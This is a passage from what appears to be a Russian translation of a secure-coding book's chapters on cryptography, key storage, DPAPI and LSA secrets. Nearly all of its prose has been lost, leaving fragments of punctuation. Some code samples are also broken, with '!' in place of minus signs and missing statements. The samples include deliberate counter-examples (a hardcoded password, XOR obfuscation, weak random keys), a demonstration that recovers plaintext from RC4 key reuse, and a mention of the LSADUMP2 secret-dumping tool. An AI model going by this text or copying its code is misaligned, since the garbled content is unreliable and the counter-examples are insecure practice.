, rand . CryptGenRandom
Windows 2000 FIPS.
230
II

, , ,
, rand C:
// .
byte[] key = new byte[32];
new Random().NextBytes(key);
, C#, 32
:
using System.Security.Cryptography;
try {
byte[] b = new byte[32];
new RNGCryptoServiceProvider().GetBytes(b);
// .
for (int i = 0; i < b.Length; i++)
Console.Write("{0} ", b[i].ToString("x"));
} catch(CryptographicException e) {
Console.WriteLine(e.Message);
}
RNGCryptoServiceProvider CryptoAPI, Crypt
GenRandom, . Visual Ba
sic .NET :
Imports System.Security.Cryptography
Dim b(32) As Byte
Dim i As Short
Try
Dim r As New RNGCryptoServiceProvider()
r.GetBytes(b)
For i = 0 To b.Length ! 1
Console.Write("{0}", b(i).ToString("x"))
Next
Catch e As CryptographicException
Console.WriteLine(e.Message)
End Try

Web-
ASP.NET ,
, . COM
Web GetRandom Utilities
231
CAPICOM v2. ,
ASP, VBScript (Visual Basic Scrip
ting Edition):
<%
set oCC = CreateObject("CAPICOM.Utilities.1")
strRand = oCC.GetRandom(32,!1)
strRand.
strRand 32 Base64.
%>
: GetRandom CAPICOM 2, 1
. CAPICOM : http://www.microsoft.com/
downloads/release.asp?ReleaseID=39546.

, ,
.
, ,
,
. ,
DES (Data Encryption Standard), 56 .
DES
0 2561 ( 0 72 057 594 037 927 899).
ASCII, AZ, az, 09,
,
.
, DES ,
, 0 2561.
,
ASCII, .
, Perl. 2001 .
Fun With Perl (http://www.technofile.org/depts/mlists/
fwp.html) ,
. :
print map chr 33+rand 93, 0..7.

, , ,
!

(Claude Shannon),
1948 . (A Mathematical
232
II
Theory of Communication), .
, ,
log2(nm), n
, m . VBSctipt ,
:
Function EntropyBits(iNumValidValues, iPwdSize)

If iNumValidValues <= 0 Then
EntropyBits = 0
Else
EntropyBits = iPwdSize * log(iNumValidValues) / log(2)
End If
End Function
' 8 ,
' A!Z, a!z, 0!9 ( 62 ).
WScript.echo(EntropyBits(62, 8))
C++:
#include <math.h>
#include <stdio.h>
double EntropyBits(double valid, double size) {
return valid ? size * log(valid) / log(2):0;
}
void main() {
printf("%f", EntropyBits(62, 8));
}
!
, ,
. , (Major),

Maj0r, ,
.
(social engineering).
, ,
.
, PIN 24601,
, .
, . ,
DES 56
. . 81,
,
56 128 .
233
8-1.

56-

128-
PIN
10 (09)
17
40
26 (AZ az)
12
28
52 (AZ az)
10
23
52 (AZ, az 09)
10
22
93 (AZ, az, 09,

)
20
,
, ,
(. 82).
. 82.

! ,
.
, ,

.
http://www.ftp.cl.cam.ac.uk/ftp/users/rja14/tr500.pdf,
The Memorability and Security of Passwords Some Empirical
Results (
).

,
NetValidatePasswordPolicy. C++ Secureco2\Chapter08.
,
, (Donald Eastlake),
(Jeffrey Schiller) (Steve Crocker) Random
234
II
ness Requirements for Security ( ,

). RFC 1750,
.
, drafteastlake
randomness202. .

,
.
, ,
.
. ,
,
.
DVD:
, exploit,
, DVD Xing
DVD Player RealNetworks Inc, Xing Technologies.
DVD ,
DeCSS,
DVD. http://www.cnn.com/TECH/computing/9911/05/
dvd.hack.idg.
This1sAPa$sword, ,
,
( Strings), EXE DLL
.
. : .
, :
// !!!! .
char *szPassword="&162hV1);sWa1";
, ,
? Strings ,
ASCII. !
. ,
, .
nCipher (http://
www.ncipher.com).
.
, , ,
SSL/TLS. !
Playing Hide and Seek with Stored Keys ( ) http://
www.ncipher.com/products/rscs/downloads/whitepapers/keyhide2.pdf. nCipher
, .
235

9.
! ,
(RC) .
. , ,
.

: .
, (ephemeral),
, IPSec, SSL/TLS, RPC DCOM.
.
,
(nonrepudiation),
. , SSL/TLS
. ,
, .
,
,
, . ,
.
, .

.
, , .
. ,
DES RC4, . RSA (
), ,
.
(factoring). ,
112 3DES , 512 RSA,
. ,
, 112
3DES.
Cryptographic Challenges (
) Web http://www.rsasecurity.com/rsalabs/challenges.
DES RSA
.
, ,
, .
236
II
. 82, Determining Strengths

For Public Keys Used For Exchanging Symmetric Keys (
, ) (http://ietf.org/
internetdrafts/draftormanpublickeylengths05.txt).
8-2.

,

RSA,

DSA,
70
947
128
80
1228
145
90
1553
153
100
1926
184
150
4575
279
200
8719
373
250
14596
475
, 80 RSA
1228 . ,
RSA, 80 .
! 128 AES 512 RSA
.

,
, ,
. :
. :
. : , ,
. , ,
. , ,
, ,
(. 83).
. 83
, . GetKey
EncryptWithKey, Encrypt, DoWork Encrypt
Data. ,
.
. GetKeyHandle
(handle) , EncryptData.
.
, .
D.EXE
237
D.EXE
szKey = GetKey("MyKey");
C.EXE
hKey = GetKey("MyKey");
C.EXE
EncryptWithKey(szKey);
B.DLL
EncryptWithKeyHandle(hKey);
B.DLL
Encrypt(szKey);
A.DLL
Encrypt(hKey);
A.DLL
DoWork(szKey);
DoWork(hKey);
EncryptData(szKey);
EncryptData(hKey);
. 83. ,

! , ,
, ,
.
CryptGenKey CryptExportKey
Microsoft CryptoAPI CryptGenKey,
,
.
CryptoAPI, .
,
, CryptExportKey
CryptImportKey.
( ),
( Windows 2000 ).
(plaintext), . .
. CryptoAPI,
.
C++, ,
:
238
II
/*
ProtectKey.cpp
*/
#include "stdafx.h"
// , .
void GetExchangeKey(HCRYPTPROV hProv, HCRYPTKEY *hXKey) {
// .
HCRYPTHASH hHash;
BYTE bKey[16];
if (!GetKeyFromStorage(bKey, sizeof bKey))
if (!CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash))
if (!CryptHashData(hHash, bKey, sizeof bKey, 0))
if (!CryptDeriveKey(hProv, CALG_3DES, hHash, CRYPT_EXPORTABLE,
hXKey))
}
void main() {
HCRYPTPROV
hProv = NULL;
HCRYPTKEY hKey = NULL;
HCRYPTKEY hExchangeKey = NULL;
LPBYTE
pbKey = NULL;
try {
if (!CryptAcquireContext(&hProv, NULL, NULL,
PROV_RSA_FULL,
// 3DES! .
// : CryptoAPI.
if (!CryptGenKey(hProv, CALG_3DES, CRYPT_EXPORTABLE, &hKey))
// , 3DES!.
GetExchangeKey(hProv, &hExchangeKey);
// (BLOB).
DWORD dwLen = 0;
if (!CryptExportKey(hKey, hExchangeKey,
SYMMETRICWRAPKEYBLOB,
239
0, pb Key, &dwLen))
pbKey = new BYTE[dwLen]; // 3DES!.
ZeroMemory(pbKey, dwLen);
if(!pbKey)throwError_NOT_ENOUGH_MEMORY;
// .
if (!CryptExportKey(hKey, hExchangeKey,
SYMMETRICWRAPKEYBLOB, 0, pbKey, &dwLen))
cout << ", " << dwLen
<< " ."
<< endl;
// Key.bin;
// ostream::write()
// <<, NULL!.
ofstream file("c:\\keys\\key.bin", ios_base::binary);
file.write(reinterpret_cast<const char *>(pbKey ), dwLen);
file.close();
} catch(DWORD e) {
cerr << " " << e << hex << " " << e << endl;
}
//
if
if
if
if
.
(hExchangeKey)
CryptDestroyKey(hExchangeKey);
(hKey)
CryptDestroyKey(hKey);
(hProv)
CryptReleaseContext(hProv, 0);
(pbKey)
delete [] pbKey;
}
GetExchangeKey ,
.

, , !
3DES. 3DES ,
. , DES.

. ,
,
. ,
,
. ,
240
II
(spoofing),
. :
, ,
.
,
.
! ,
( !). :
? ,

, .
, .
,
. , ,
( , ),
( 9).

( ,
, , )* .
, , .
,
, .
IPSec Windows 2000 . . 84
,
.
. 84.

,
, ,
sneakernet, sneaker net . . .
241
, , ,
. ,
, . , SSL/TLS IPSec
.
, .
: ,
,
(Diffie Hellman) RSA.
. ,
, .

, : ,
. !
, ,
, , .
,
. , :
void EncryptData(char *szKey,

DWORD dwKeyLen,
char *szData,
DWORD dwDataLen) {
for (int i = 0; i < dwDataLen; i++) {
szData[i] ^= szKey[i % dwKeyLen];
}
}
XOR ;
,
. , .
. ,
. :
, .
XOR ,
, !
* !
!
, , CryptoAPI,
Windows. ,
, , (obfuscate)
, ,
encraption, encryption (), crap

. . .
242
II
,
.
XOR
, XOR, .
( )
:
A B A = B

. XOR ,
. XOR
, .
, !
JScript, CAPICOM,
, .
var
var
var
var
CAPICOM_ENCRYPTION_ALGORITHM_RC2 = 0;
CAPICOM_ENCRYPTION_ALGORITHM_RC4 = 1;
CAPICOM_ENCRYPTION_ALGORITHM_DES = 2;
CAPICOM_ENCRYPTION_ALGORITHM_3DES = 3;
var oCrypto = new ActiveXObject("CAPICOM.EncryptedData");

// .
var strPlaintext = "! ...";
oCrypto.Content = strPlaintext;
// , .
oCrypto.SetSecret(GetKeyFromUser());
oCrypto.Algorithm = CAPICOM_ENCRYPTION_ALGORITHM_3DES;
var strCiphertext = oCrypto.Encrypt(0);
// .
oCrypto.Decrypt(strCiphertext);
if (oCrypto.Content == strPlaintext) {
WScript.echo("!");
}
CAPICOM? COM,
.
, ,
. ,
. CAPICOM Windows XP Beta 2 Platform
SDK. Capicom.dll
243
. DLL
Web http://www.microsoft.com/downloads/release.asp?relea
seid=39546.
!
. , .
Win32 CryptoAPI,
(VBScript, JScript ASP) CAPICOM. .NET
( ASP.NET)
System.Security.Cryptography.

.
. 256
, ,
, ?
, . ,
256 , ?
? ,
. ,
, , .
,
.

(stream cipher)
, 1 . (RC4
.
, ,
CryptoAPI Windows.) , ,
,
. ,
;
. XOR
, .
: XOR
.

, .
(, RSA), ,
. : DES, 3DES, AES (Advan
ced Encryption Standard, DES), IDEA [ Pretty Good
244
II
Privacy (PGP)] RC2 ,

.
64 128 .

,
. , 13 , 13
. DES, 64 , 13
16 . 3
, DES 64 .
, 13 DES ,
5 3 ( , ),
8 .
, , ,
, !
.
RC4 10 DES.
, .
.

,
.
, , .
,
.
,
. ,
.
.
,
XOR . ,
, . , , .

: ,
. , 23
, 23 .
, ,
CryptoAPI:
/*
RC4Test.cpp
*/
#define MAX_BLOB 50
BYTE bPlainText1[MAX_BLOB];
BYTE bPlainText2[MAX_BLOB];
BYTE bCipherText1[MAX_BLOB];
245
BYTE bCipherText2[MAX_BLOB];
BYTE bKeyStream[MAX_BLOB];
BYTE bKey[MAX_BLOB];
//////////////////////////////////////////////////////////////////
// 2
// .
void Setup() {
ZeroMemory(bPlainText1, MAX_BLOB);
ZeroMemory(bPlainText2, MAX_BLOB);
ZeroMemory(bCipherText1, MAX_BLOB);
ZeroMemory(bCipherText2, MAX_BLOB);
ZeroMemory(bKeyStream, MAX_BLOB);
ZeroMemory(bKey, MAX_BLOB);
strncpy(reinterpret_cast<char*>(bPlainText1),
", 6 .", MAX_BLOB!1);
strncpy(reinterpret_cast<char*>(bPlainText2),
" .", MAX_BLOB!1);
strncpy(reinterpret_cast<char*>(bKey),
GetKeyFromUser(), MAX_BLOB!1);
// .
}
//////////////////////////////////////////////////////////////////
// Encrypt RC4.
void Encrypt(LPBYTE bKey,
LPBYTE bPlaintext,
LPBYTE bCipherText,
DWORD dwHowMuch) {
HCRYPTPROV hProv;
HCRYPTKEY hKey;
HCRYPTHASH hHash;
/*
:
.
"".
, !.
3 .
.
4 .
*/
DWORD dwBuff = dwHowMuch;
CopyMemory(bCipherText, bPlaintext, dwHowMuch);
if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL,
throw;
246
II
if (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash))

throw;
if (!CryptHashData(hHash, bKey, MAX_BLOB, 0))
throw;
if (!CryptDeriveKey(hProv, CALG_RC4, hHash,
CRYPT_EXPORTABLE,
&hKey))
throw;
if (!CryptEncrypt(hKey, 0, TRUE, 0,
bCipherText,
&dwBuff,
dwHowMuch))
throw;
if (hKey) CryptDestroyKey(hKey);
if (hHash) CryptDestroyHash(hHash);
if (hProv) CryptReleaseContext(hProv, 0);
}
void main() {
Setup();
// bKey.
try {
Encrypt(bKey, bPlainText1, bCipherText1, MAX_BLOB);
Encrypt(bKey, bPlainText2, bCipherText2, MAX_BLOB);
} catch (...) {
printf(" ! %d", GetLastError());
return;
}
// "".
// .
for (int i = 0; i < MAX_BLOB; i++) {
BYTE c1 = bCipherText1[i];
//
BYTE p1 = bPlainText1[i];
//
BYTE k1 = c1 ^ p1;
// .
BYTE p2 = k1 ^ bCipherText2[i]; //
// .
printf("%c", p2);
}
}
,
!

, .
, XOR,
XOR . :
247
.
. , E, T
A. , (
) . (, , .)

,
(DES 3DES).
. ,
( ) .
. ,
,
,
.
,

, :
, ! ,
,
.
(salt) , ,
.
.
UNIX
.
( /etc/passwd).
.
, ! Windows
, Windows 2000
,
. Windows NT 4.0 SP 3
Syskey ( ).
CryptoAPI,
.
if (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash))

throw;
if (!CryptHashData(hHash, bKey, MAX_BLOB,0))
throw;
if (!CryptHashData(hHash, bSalt, cbSaltSize, 0))
throw;
if (!CryptDeriveKey(hProv, CALG_RC4,
hHash, CRYPT_E XPORTABLE,
&hKey))
throw;
248
II
;
, .
! .
,
,
.
,
.
, .
,
, .

,
, .
.NET Framework .
, ,
.

, , ,

XOR ,
. (bit
flip). 1
, , . ,
, .
, , :
hh:mm dd!mmm!yyyy. bbbbbbbbbbbbbbbbbbbbbbbbbbbb

hh 24 , mm , dd , mmm
, , yyyy , bbbbb
. (Squirt) (Major) .
:
16:00 03!Sep!2004. . .
, ,
.
,
3 2004 4 . , , ,
, .

( , )
249
, , .
( 16:00),
. !

( ).
. ,
, ,
. , .
, ,
, . 85.
, ,

,
. 85. ,

: ,
,
. ,
.
.

(keyed hash)
, .

.
, .

(message authentication code, MAC). Web
What are Message Authentication Codes (
) (http://www.rsasecurity.com/rsalabs/
faq/217.html).
250
II
. 86 .

MAC

MAC
MAC-
. 86.
MAC-
, .
, ,
.

, ,
. .
!

. (1),
(2), 1,
, 2, . 1,
.
2 1
,
(, ). :
!

CryptoAPI, .NET Framework
. CryptoAPI,
HMAC (HashBased Message Authentication Code).
Secureco2\Chapter08\MAC. HMAC RFC 2104
(http://www.ietf.org/rfc/rfc2104.txt).
/*
MAC.cpp
*/
#include "stdafx.h"
DWORD HMACStuff(void *szKey, DWORD cbKey,

void *pbData, DWORD cbData,
LPBYTE *pbHMAC, LPDWORD pcbHMAC) {
DWORD dwErr = 0;
HCRYPTPROV hProv;
HCRYPTKEY hKey;
HCRYPTHASH hHash, hKeyHash;
try {
if (!CryptAcquireContext(&hProv, 0, 0,
PROV_RSA_FULL, CRYPT_VERIFYCONTEXT))
throw;
// .
if (!CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hKeyHash))
throw;
if (!CryptHashData(hKeyHash, (LPBYTE)szKey, cbKey, 0))
throw;
if (!CryptDeriveKey(hProv, CALG_DES,
hKeyHash, 0, &hKey))
throw;
// !.
if(!CryptCreateHash(hProv, CALG_HMAC, hKey, 0, &hHash))
throw;
HMAC_INFO hmacInfo;
ZeroMemory(&hmacInfo, sizeof(HMAC_INFO));
hmacInfo.HashAlgid = CALG_SHA1;
if(!CryptSetHashParam(hHash, HP_HMAC_INFO,
(LPBYTE)&hmacInfo,
0))
throw;
// HMAC .
if(!CryptHashData(hHash, (LPBYTE)pbData, cbData, 0))
throw;
// HMAC.
DWORD cbHMAC = 0;
if(!CryptGetHashParam(hHash, HP_HASHVAL, NULL, &cbHMAC, 0))
throw;
// .
*pcbHMAC = cbHMAC;
*pbHMAC = new BYTE[cbHMAC];
251
252
II
if (NULL == *pbHMAC)
throw;
if(!CryptGetHashParam(hHash, HP_HASHVAL, *pbHMAC, &cbHMAC, 0))
throw;
SetLastError()
} catch(...) {
dwErr = GetLastError();
printf(" ! %d\n", GetLastError());
}
if
if
if
if
(hProv)
(hKeyHash)
(hKey)
(hHash)
CryptDestroyKey(hKeyHash);
CryptDestroyKey(hKey);
CryptDestroyHash(hHash);
return dwErr;
}
void main() {
// .
char *szKey = GetKeyFromUser();
DWORD cbKey = lstrlen(szKey);
if (cbKey == 0) {
printf(" .\n");
return !1;
}
char *szData = "! ...";
DWORD cbData = lstrlen(szData);
// HMAC pbHMAC.
// HMAC ! cbHMAC .
LPBYTE pbHMAC = NULL;
DWORD cbHMAC = 0;
DWORD dwErr = HMACStuff(szKey, cbKey,
szData, cbData,
&pbHMAC, &cbHMAC);
// ! pbHMAC.
delete [] pbHMAC;
}
.NET Framework , ,
, .
HMACSHA1 hmac = new HMACSHA1();

hmac.Key = key;
byte [] hash = hmac.ComputeHash(message);
253
key () message ()
, hash HMAC.
! ,
.NET Framework. ,
.

MAC,
:
. MAC
;
MAC ;
(nonrepu
diation) ( ). MAC
,
MAC;
, MAC ( ).
,
, , MAC.
. 87.

. 87.
, ,
( ,
, , !).
.
254
II
CAPICOM
. VBScript ,
:
strText = " $42,69."

Set oDigSig = CreateObject("CAPICOM.SignedData")
oDigSig.Content = strText
fDetached = TRUE
signature = oDigSig.Sign(Nothing, fDetached)
oDigSig.Verify signature, fDetached
. ,
.
. (detached) ,
, . ,
.
.NET Framework . ,
,
CryptoAPI, CryptoAPI CAPICOM
, System.Security.Cryptography.X509Cer
tificates CryptoAPI.
.NET Framework Security ( .NET Framework) (AddisonWesley Profes
sional, 2002) (. ).
, , .NET
Framework (Common Language Runtime).
! , MAC
,
. , ,

.
!
MAC .

, .
. .
, ,
, . (
,
.) :
, , !
:
255
1. ;
2. ;
3. .
. ,
:
1. ;
2. ;
3. .
!
IIS 4. , SSL
,
.
: (, , )
. , , .
, . Web
http://www.microsoft.com/technet/security/bulletin/MS99053.asp.
, ,
, .
, , ,
, ,
. :
char *bCiphertext = new char[cbCiphertext];

ZeroMemory(bCiphertext, cbCiphertext);
SSLEncryptData(bPlaintext, cbPlaintext, bCiphertext, cbCiphertext);
SSLSend(socket, bCiphertext, cbCiphertext);
ZeroMemory(bCiphertext, cbCiphertext);
delete [] bCipherText;

.
.

, ,
. . 83 , , ,
.
256
II
8-3.

RC2, RC4, DES, 3DES, AES
( Rijndael)

SHA1, SHA256, SHA384, SHA512,

MD4, MD5, HMAC,
, RSA DSS, XML DSig
MAC

. ,
, . ,
, ,
,
.
, ,
: MD4 MD5.
? . ,
. , MD4 MD5
, . ,
, .

,
,
.
,
API
. .
. ,
? ,
, .

, ,
, . ,
,
.
, .
, ,
. ,
,
. : , ,
( ) ,
,
Microsoft Windows, ,
,
, ,
.
,
(persistent) . (ephemeral) ,
, .
SSL/TLS, IPSec, RPC DCOM
. .
! .
,
. : ,
, .
258
II

, :
( ) .
, . , ,
Blake, Blake.
, (spoofing) .
,
, ,
.
, , .
, ?
? ? ,
.
, , ,
. (, , ?) ,
,
, .
.
() .
,
, . .
Windows NT
, Debug programs (
). Microsoft Platform SDK
SeDebugPrivilege SE_DEBUG_NAME.
, .
.

. Pagefile.sys,
.
: Hiberfil.sys,
, .
, ,
, (, Dr. Wat
son) . ,
.
: ,
, , .
, , , ,
.

,
( ), ,
(verifier),
259
. ,
,
, , , .
, .
,
( ) .

(hash function), (digest function),
,

. ,
, .
128 160 , . ,
RSA Data Security Inc. MD5
128 , SHA1 [
(National Institute of Standards and Technology, NIST)
(National Security Agency, NSA)]
160 . ( SHA1.
NIST SHA1: SHA256, SHA384
SHA512. Microsoft CryptoAPI MD4, MD5 SHA1, .NET
Framework MD5, SHA1, SHA256, SHA384 SHA512. (
SHA Web csrc.nc
sl.nist.gov/cryptval/shs.html.)
,
,
.
( .
, ,
.) ,
, .

, .
(salt) ,
,
. (dictionary attack)
, ,
, .
,

(
8).

CryptoAPI . C/C++:
260
II
// .
if (!CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash))
if (!CryptHashData(hHash, (LPBYTE)bSecret, cbSecret, 0))
if (!CryptHashData(hHash, (LPBYTE)bSalt, cbSalt, 0))
// .
DWORD cbSaltedHash = 0;
DWORD cbSaltedHashLen = sizeof (DWORD);
if (!CryptGetHashParam(hHash, HP_HASHSIZE, (BYTE*)&cbSaltedHash,
&cbSaltedHashLen, 0))
// .
BYTE *pbSaltedHash = new BYTE[cbSaltedHash];
if (NULL == *pbSaltedHash) throw;
if(!CryptGetHashParam(hHash, HP_HASHVAL, pbSaltedHash,
&cbSaltedHash, 0))
, C#:
using System;
using System.Security.Cryptography;
using System.IO;
using System.Text;
...
static byte[] HashPwd(byte[] pwd, byte[] salt) {
SHA1 sha1 = SHA1.Create();
UTF8Encoding utf8 = new UTF8Encoding();
CryptoStream cs =
new CryptoStream(Stream.Null, sha1, CryptoStreamMode.Write);
cs.Write(pwd,0,pwd.Length);
cs.Write(salt,0,salt.Length);
cs.FlushFinalBlock();
return sha1.Hash;
}
Secureco2\Chapter09\Sal
tedHash. , , :
, ,
. CryptGetHashParam
Windows API
, , .
, .
, ,
(). ,
, .
261
.
.
PKCS #5
,

.
PKCS #5 (PublicKey Cryptography Standard).
, RSA Data Security
, Microsoft, Apple Sun Microsystems. PKCS #5
RFC 2898 (http://www.ietf.org/rfc/rfc2898.txt).
PKCS#5
. , , PBKDF1 (Password
Based Key Derivation Function #1) PKCS #5.
, PBKDF2, :
. , PKCS #5,
PBKDF1.
PKCS #5 ,
.
,
.
, , ,
PKCS #5.
,
.
1. .
2. .
3. .
4. .
5. PKCS #5.
, 64 , ,
, 264 ( 263,
, ,
). , .
,
PKCS #5. ,
PKCS #5 .
,
, .
C#
:
static byte[] DeriveBytes(string pwd, byte[] salt, int iter) {

PasswordDeriveBytes p =
new PasswordDeriveBytes(pwd,salt,"SHA1",iter);
return p.GetBytes(16);
}
262
II
: CryptoAPI Windows
PKCS #5, CryptDeriveKey,
.
,
.
! :
! , PKCS #5
, ,
.

.
,

. ? , ,
.
, ,
.

, .
, ,
,
.
. ,
, (
) ,
.
,
.
Windows 2000

Windows 2000
CryptProtectData CryptUnprotectData API DPAPI (Data Protection
API). DPAPI :

. CRYPTPROTECT_LO
CAL_MACHINE dwFlags,
ACL , , ,
DPAPI. ,
Accounting (), ACL
:
263
Administrators: Full Control (: );

Accounting: Read ().
DPAPI
,
.
CryptProtectData, ,
, .
LoadUserProfile. ,

.

,
CRYPTPROTECT_LOCAL_MACHINE.
CryptProtectData
MAC.
! , DPAPI (,
, ), ,
. :
, .
DPAPI
. DPAPI
, ?
. . CryptProtectData CRYPTPROTECT_LO
CAL_MACHINE ,
. ,
, CryptProtectData.
,
(ACL),
pOptionalEntropy.
DPAPI
. ( )
, ?
.
, ,
, .
CryptProtecData pOptionalEntropy
, ,
.
, CryptUnprotectData
, !
264
II
( 16 ),
/
.
! CRYPTPROTECT_LOCAL_MA
CHINE, .
,
,
.
, ,
SYSTEM, Windows 2000/XP LsaStore
PrivateData LsaRetrievePrivateData API
LSA.
, LSA 4096 ,
(2048) . ,
. DPAPI. LSA
Windows NT 4.
,
DPAPI ( Secureco2\Chap
ter09\DPAPI).
// .
DATA_BLOB blobIn;
blobIn.pbData = reinterpret_cast<BYTE *>("This is my secret data.";
blobIn.cbData = lstrlen(reinterpret_cast<char *>(blobIn.pbData))+1;
// .
DATA_BLOB blobEntropy;
blobEntropy.pbData = GetEntropyFromUser();
blobEntropy.cbData = lstrlen(
reinterpret_cast<char *>(blobEntropy.pbData));
// .
DATA_BLOB blobOut;
DWORD dwFlags = CRYPTPROTECT_AUDIT;
if(CryptProtectData(
&blobIn,
L"Writing Secure Code Example",
&blobEntropy,
NULL,
NULL,
dwFlags,
&blobOut))
{
printf(" .\n");
} else {
printf(" CryptProtectData() !> %x",
GetLastError());
265
exit(!1);
}
// .
DATA_BLOB blobVerify;
if (CryptUnprotectData(
&blobOut,
NULL,
&blobEntropy,
NULL,
NULL,
0,
&blobVerify)) {
printf(" : %s\n", blobVerify .pbData);
} else {
printf(" CryptUnprotectData() ! > %x",
GetLastError());
exit(!1);
}
LocalFree(blobOut.pbData);
LocalFree(blobVerify.pbData);
DPAPI Web
http://msdn.microsoft.com/library/enus/dnsecure/html/windatapro
tectiondpapi.asp.
: Windows XP
Windows XP Stored User Names and Passwords (
),
(
) .
, ,
. :
,
;
DPAPI;

,
.
Stored User Names and Passwords :
Windows .
, Kerberos.

SSPI (Security Support Provider Interface).
, ,
266
II
,

SQL.
(. Secureco2\Chapter09\Cred) ,
.
/*
Cred.cpp
*/
#include <stdio.h>
#include <wincred.h>
CREDUI_INFO cui;
cui.cbSize = sizeof CREDUI_INFO;
cui.hwndParent = NULL;
cui.pszMessageText =
TEXT(",
Northwind Traders Accounts.");
cui.pszCaptionText = TEXT("Northwind Traders Accounts") ;
cui.hbmBanner = NULL;
PCTSTR pszTargetName = TEXT("NorthwindAccountsServer");
DWORD dwErrReason = 0;
Char pszName[CREDUI_MAX_USERNAME_LENGTH+1];
Char pszPwd[CREDUI_MAX_PASSWORD_LENGTH+1];
DWORD dwName = CREDUI_MAX_USERNAME_LENGTH;
DWORD dwPwd = CREDUI_MAX_PASSWORD_LENGTH;
BOOL fSave = FALSE;
DWORD dwFlags =
CREDUI_FLAGS_GENERIC_CREDENTIALS |
CREDUI_FLAGS_ALWAYS_SHOW_UI;
// .
ZeroMemory(pszName, dwName);
ZeroMemory(pszPwd, dwPwd);
DWORD err = CredUIPromptForCredentials(
&cui,
pszTargetName,
NULL,
dwErrReason,
pszName,dwName,
pszPwd,dwPwd,
&fSave,
dwFlags);
if (err)
printf(" CredUIPromptForCredentials() !> %d",
GetLastError());
267
else {
// Northwind Traders Accounting
// pszName pszPwd .
}
, . 91. :
,
( NorthwindAccountsServer) DPAPI.
. 91. Credential Manager

CredUICmdLinePromptForCre
dentials, .
,
, ,
Platform SDK, .
! : ,
, , ,
.
Windows NT 4
Windows NT 4 DPAPI, CryptoAPI ACL.
.
1. CryptGenRandom .
2. .
3. ACL Creator/Owner Admi
nistrators.
4. ,
ACE (SACL), .

. ,

268
II
. ,
, .
, LSA (
LsaStorePrivateData LsaRetrievePrivateData). LSA
: , , .
( ),
. .
LSA L$. LSA,
,
. LSA G$.
LSA
, M$. (private) LSA,
, .
,
. ,
SC_. ,
, LsaStorePrivateData
MSDN.
LSA DPAPI
, :
LSA 4096 , DPAPI
;
LSA ,
DPAPI ;
DPAPI , LSA
;
LSA , DPAPI

, , ;
LSA,
. DPAPI
, ACL,
.
LSA,
LSA. C++,
:
// LSASecrets.cpp : .
#include <stdio.h>
#include "ntsecapi.h"
bool InitUnicodeString(LSA_UNICODE_STRING* pUs, const WCHAR* input){
DWORD len = 0;
if(!pUs)
269
return false;
if(input){
len = wcslen(input);
if(len > 0x7ffe) // 32k, FALSE;
}
pUs!>Buffer = (WCHAR*)input;
pUs!>Length = (USHORT)len * sizeof(WCHAR);
pUs!>MaximumLength = (USHORT)(len + 1) * sizeof(WCHAR);
return true;
}
LSA_HANDLE GetLSAPolicyHandle(WCHAR *wszSystemName) {
LSA_OBJECT_ATTRIBUTES ObjectAttributes;
ZeroMemory(&ObjectAttributes, sizeof(ObjectAttributes));
LSA_UNICODE_STRING lusSystemName;
if(!InitUnicodeString(&lusSystemName, wszSystemName))return NULL;
LSA_HANDLE hLSAPolicy = NULL;
NTSTATUS ntsResult = LsaOpenPolicy(&lusSystemName,&ObjectAttributes,
POLICY_ALL_ACCESS,
&hLSAPolicy);
DWORD dwStatus = LsaNtStatusToWinError(ntsResult);
if (dwStatus != ERROR_SUCCESS) {
wprintf(L"OpenPolicy returned %lu\n",dwStatus);
return NULL;
}
return hLSAPolicy;
}
(. Secureco2\Chapter09\LSASecrets) ,
LSA :
DWORD WriteLsaSecret(LSA_HANDLE hLSA,

WCHAR *wszSecret, WCHAR *wszName)
{
LSA_UNICODE_STRING lucName;
if(!InitUnicodeString(&lucName, wszName))
return ERROR_INVALID_PARAMETER;
LSA_UNICODE_STRING lucSecret;
if(!InitUnicodeString(&lucSecret, wszSecret))
NTSTATUS ntsResult = LsaStorePrivateData(hLSA,&lucName, &lucSecret);
if (dwStatus != ERROR_SUCCESS)
wprintf(L" %lu\n",dwStatus);
return dwStatus;
}
DWORD ReadLsaSecret(LSA_HANDLE hLSA,DWORD dwBuffLen,
WCHAR *wszSecret, WCHAR *wszName)
270
II
{
LSA_UNICODE_STRING lucName;
if(!InitUnicodeString(&lucName, wszName))
PLSA_UNICODE_STRING plucSecret = NULL;
NTSTATUS ntsResult = LsaRetrievePrivateData(hLSA,
&lucName, &plucSecret);
if (dwStatus != ERROR_SUCCESS)
wprintf(L" %lu\n",dwStatus);
else
wcsncpy(wszSecret, plucSecret!>Buffer,
min((plucSecret!>Length)/sizeof WCHAR,dwBuffLen));
if (plucSecret)
LsaFreeMemory(plucSecret);
return dwStatus;
}
int main(int argc, char* argv[]) {
LSA_HANDLE hLSA = GetLSAPolicyHandle(NULL);
WCHAR *wszName = L"L$WritingSecureCode";
WCHAR *wszSecret = L"My Secret Data!";
if (WriteLsaSecret(hLSA, wszSecret, wszName) == ERROR_SUCCESS) {
WCHAR wszSecretRead[128];
if (ReadLsaSecret(hLSA,sizeof wszSecretRead / sizeof WCHAR,
wszSecretRead,wszName) == ERROR_SUCCESS)
wprintf(L" LSA '%s' '%s'\n",wszName,wszSecretRead);
}
if (hLSA) LsaClose(hLSA);
return 0;
}
LSA, LsaStorePrivateData NULL.
, LSA,
, LSADUMP2.exe,
BindView (http://razor.bindview.com/tools/desc/lsadump2_
readme.html). ,
!
Windows 95/98/Me
Windows CE
Windows 95/98/Me Windows CE (
) CryptoAPI, ACL.
, ,
, ? ?
271
ACL? .
.
, , Windows NT 4 Windows 2000/XP.
, ( )
Windows 95/98/Me Windows CE ,
.
Crypt
GenRandom, ,
, , , ,
.. ,
.
, ,
, .
,
. :
.
, ,
.
HKEY_LOCAL_MACHINE\HARDWARE Windows 95/98/Me
, .
, , . ,

.
PnP
Plug and Play Windows 98, Windows 2000

. ,
,
. , :
,
SHA1,
. Web
http://msdn.microsoft.com/library/enus/devio/deviceman_7u9f.asp.
#include "wincrypt.h"
#include "initguid.h"
#include "Setupapi.h"
#include "winioctl.h"
// (DDK),
// !
DEFINE_GUID( GUID_DEVCLASS_CDROM,
\
0x4d36e965L, 0xe325, 0x11ce, 0xbf, 0xc1,
